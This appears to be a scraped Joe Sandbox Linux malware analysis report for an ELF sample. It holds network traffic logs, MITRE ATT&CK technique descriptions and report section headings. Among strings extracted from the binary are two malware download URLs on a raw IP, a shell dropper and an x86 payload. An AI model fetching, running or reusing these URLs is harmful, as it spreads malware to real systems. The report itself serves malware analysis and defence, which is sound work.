Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 May 2022 10:32:34 GMTServer: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.15X-Powered-By: PHP/5.6.15Set-Cookie: whytouch_token=false; expires=Fri, 27-May-2022 10:15:54 GMT; Max-Age=-1000Content-Encoding: gzipVary: Accept-EncodingContent-Length: 5623Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 0b c5 3b 69 73 db 46 96 9f 95 aa fc 87 36 ec 58 e4 5a 00 2f 51 94 48 91 39 6c 27 a3 2a 3b 56 62 25 9b 8c a3 75 81 44 93 84 05 02 30 00 8a 52 64 55 c9 ce 3a b1 e3 2b d9 71 0e 7b 9d c3 59 3b f1 24 e3 63 26 bb e3 4b 76 fe cb 46 a4 a4 4f f9 0b fb fa 00 d0 20 29 8e 32 49 d5 2a 91 05 36 de 7b fd ae 7e 47 77 73 72 c7 be 43 7b 67 de 9e de 8f ea 5e c3 28 3d fb cc 24 f9 8b 0c d5 ac 15 25 6c 4a 30 82 d0 64 1d ab 1a 7d 82 e7 06 f6 54 54 a9 ab 8e 8b bd a2 d4 f4 aa f2 b8 c4 df a1 49 4f f7 0c 5c 9a b1 9a 95 ba 5b b7 5a a8 fd f4 4e 67 f5 f2 fa 8d 47 48 96 d1 f4 f4 4c 62 7a df cb 68 e3 c9 e3 ce 17 4f db 97 3e ee 9c 3d d7 b9 f6 68 32 c1 b0 22 f4 2d d3 c3 26 d0 9f da 5f c4 5a 0d 8f 54 ea 8e d5 c0 c5 94 04 7c 7a b6 8c 8f 37 f5 f9 a2 f4 96 fc c6 8b f2 5e ab 61 ab 9e 5e 36 b0 14 a1 61 aa 80 20 cd eb b8 65 5b 8e 27 85 34 5b ba e6 d5 8b 1a 9e d7 2b 58 a6 1f 46 90 6e ea 9e ae 1a b2 5b 51 0d 98 46 49 f6 a3 35 87 17 5b 96 a3 b9 02 2d 5b ab 22 cf a2 ca cb 8e 20 db f6 10 91 eb da b9 f6 a5 73 ed 6b 67 60 04 de 77 8d 10 98 33 ef af 3d fa 01 94 b3 f6 d3 75 0e 13 19 a1 40 9c ec 88 f8 21 cb a0 c3 57 56 0b 3b b6 a5 9b de a0 31 c0 72 0d 5d c3 88 d8 64 04 59 a6 a1 9b 98 92 05 39 e6 b1 e3 61 27 1c 0d b1 85 97 fd 47 ab 0e c6 3e de 16 c3 fd 11 43 6e 38 1c 13 52 7c 06 d6 ab 6a 05 97 2d 6b 2e 18 f0 5a ba c7 d8 61 9f 5b b8 dc cf 4c 6a d3 ab 5b 8e 60 24 02 34 24 42 64 c6 92 b2 ab 7b 58 06 86 f4 aa 5e 01 f7 b1 4c 01 21 59 ce a9 5a 7a 2c 95 9a c8 a9 b9 4c b6 3a 3a 5e 4d 6b 5a 2e 99 4b 67 b3 38 9b ce 48 28 11 92 b4 1d cb 06 b9 16 8b d2 f1 4a 5e d5 1a ba 29 3a 48 6a 34 9b cb 8c 65 b3 a3 63 b9 64 6a 34 97 cd 24 c7 32 b9 6c 8e 51 a0 9c 83 cc 73 c8 c1 46 51 72 bd 45 03 bb 75 8c c1 5b bd 45 1b 18 f5 f0 82 97 a8 b8 40 b0 ee e0 6a 51 32 f4 72 02 54 e2 b9 9e a3 da e4 45 f8 49 21 60 bf 33 4d d9 c1 ae 6d 99 ae 3e 8f ff 69 f2 21 84 9b f0 ea b8 b1 1d 4a 21 63 55 d0 a3 ac b6 b0 0b ab 9f f2 26 0e f8 94 86 06 92 11 19 28 ab a6 89 9d 08 07 6e c5 d1 c1 9d 5c a7 c2 66 3c 76 bc 89 9d 45 39 a5 8c 2b 29 05 8c a9 1c 73 23 a2 1d 53 e7 55 86 23 95 26 13 ec 89 f2 d0 9f 90 d2 b0 9a 2e 6e c1 f4 c6 36 29 51 ae 76 40 bc dc 87 1b 16 b2 d5 1a 59 5c b0 5c 64 b9 8b e5 2d 48 a1 67 9f 39 f6 1a 99 3a 56 6d 9a 15 e2 d9 b1 5d 71 b4 44 30 19 fe ae 98 a4 b8 15 cb 31 8c 86 35 8f a5 b8 52 31 f4 ca 5c 08 0d c0 3c 9e 33 60 16 56 ca 96 b6 08 b0 aa a9 37 54 0f c7 04 10 f2 03 93 5b 86 31 63 d9 79 c0 d8 15 f3 ea ba 0b b0 9e e7 00 3a 58 41 8a c7 15 ab 5a 85 94 11 8b 2b 9e 65 a3 3d 48 b2 17 a4 90 27 f2 b3 3c 82 b2 c9 64 bc 10 1d 75 b0 d7 74 4c 08 06 86 8b 85 57 cb f1 02 28 dd e7 8e 33 57 d6 4d 2d 26 85 1a 97 46 02 a1 f0 3c

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.31.105.112
Source: unknown	TCP traffic detected without corresponding DNS query: 95.21.34.188
Source: unknown	TCP traffic detected without corresponding DNS query: 62.182.198.188
Source: unknown	TCP traffic detected without corresponding DNS query: 62.38.59.93
Source: unknown	TCP traffic detected without corresponding DNS query: 31.82.196.224
Source: unknown	TCP traffic detected without corresponding DNS query: 95.174.116.225
Source: unknown	TCP traffic detected without corresponding DNS query: 31.173.116.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.95.95.229
Source: unknown	TCP traffic detected without corresponding DNS query: 95.238.5.169
Source: unknown	TCP traffic detected without corresponding DNS query: 62.17.148.51
Source: unknown	TCP traffic detected without corresponding DNS query: 62.66.72.188
Source: unknown	TCP traffic detected without corresponding DNS query: 31.104.229.25
Source: unknown	TCP traffic detected without corresponding DNS query: 31.71.223.208
Source: unknown	TCP traffic detected without corresponding DNS query: 94.2.244.188
Source: unknown	TCP traffic detected without corresponding DNS query: 95.200.122.26
Source: unknown	TCP traffic detected without corresponding DNS query: 94.85.29.138
Source: unknown	TCP traffic detected without corresponding DNS query: 94.224.86.23
Source: unknown	TCP traffic detected without corresponding DNS query: 85.211.213.164
Source: unknown	TCP traffic detected without corresponding DNS query: 31.234.40.82
Source: unknown	TCP traffic detected without corresponding DNS query: 85.123.124.212
Source: unknown	TCP traffic detected without corresponding DNS query: 94.173.7.105
Source: unknown	TCP traffic detected without corresponding DNS query: 95.206.173.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.39.31.92
Source: unknown	TCP traffic detected without corresponding DNS query: 31.204.8.101
Source: unknown	TCP traffic detected without corresponding DNS query: 85.30.32.68
Source: unknown	TCP traffic detected without corresponding DNS query: 94.99.114.216
Source: unknown	TCP traffic detected without corresponding DNS query: 31.118.166.157
Source: unknown	TCP traffic detected without corresponding DNS query: 85.155.126.89
Source: unknown	TCP traffic detected without corresponding DNS query: 31.38.157.235
Source: unknown	TCP traffic detected without corresponding DNS query: 62.93.152.162
Source: unknown	TCP traffic detected without corresponding DNS query: 95.19.78.244
Source: unknown	TCP traffic detected without corresponding DNS query: 31.106.170.112
Source: unknown	TCP traffic detected without corresponding DNS query: 95.113.182.89
Source: unknown	TCP traffic detected without corresponding DNS query: 94.203.184.134
Source: unknown	TCP traffic detected without corresponding DNS query: 31.116.54.52
Source: unknown	TCP traffic detected without corresponding DNS query: 95.100.83.32
Source: unknown	TCP traffic detected without corresponding DNS query: 62.191.160.7
Source: unknown	TCP traffic detected without corresponding DNS query: 62.164.34.61
Source: unknown	TCP traffic detected without corresponding DNS query: 62.217.171.160
Source: unknown	TCP traffic detected without corresponding DNS query: 85.201.5.25
Source: unknown	TCP traffic detected without corresponding DNS query: 85.50.185.238
Source: unknown	TCP traffic detected without corresponding DNS query: 94.140.96.24
Source: unknown	TCP traffic detected without corresponding DNS query: 31.30.206.154
Source: unknown	TCP traffic detected without corresponding DNS query: 94.246.226.195
Source: unknown	TCP traffic detected without corresponding DNS query: 94.225.124.144
Source: unknown	TCP traffic detected without corresponding DNS query: 85.95.214.19
Source: unknown	TCP traffic detected without corresponding DNS query: 31.243.222.35
Source: unknown	TCP traffic detected without corresponding DNS query: 85.154.102.254

Source: qFhgp7xLT7	String found in binary or memory: http://45.95.55.16/8UsA.sh;
Source: qFhgp7xLT7	String found in binary or memory: http://45.95.55.16/bins/x86
Source: qFhgp7xLT7	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: qFhgp7xLT7	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	API monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report qFhgp7xLT7

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

PCAP (Network Traffic)

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: qFhgp7xLT7 PID: 6237, Parent PID: 6125

General

Analysis Process: qFhgp7xLT7 PID: 6238, Parent PID: 6237

General

Analysis Process: qFhgp7xLT7 PID: 6239, Parent PID: 6237

General

Analysis Process: qFhgp7xLT7 PID: 6240, Parent PID: 6237

General

Analysis Process: qFhgp7xLT7 PID: 6241, Parent PID: 6240

General

Analysis Process: qFhgp7xLT7 PID: 6242, Parent PID: 6240

General

Analysis Process: qFhgp7xLT7 PID: 6244, Parent PID: 6240

General

Analysis Process: qFhgp7xLT7 PID: 6245, Parent PID: 6240

General

Analysis Process: qFhgp7xLT7 PID: 6246, Parent PID: 6240

General

Linux Analysis Report
qFhgp7xLT7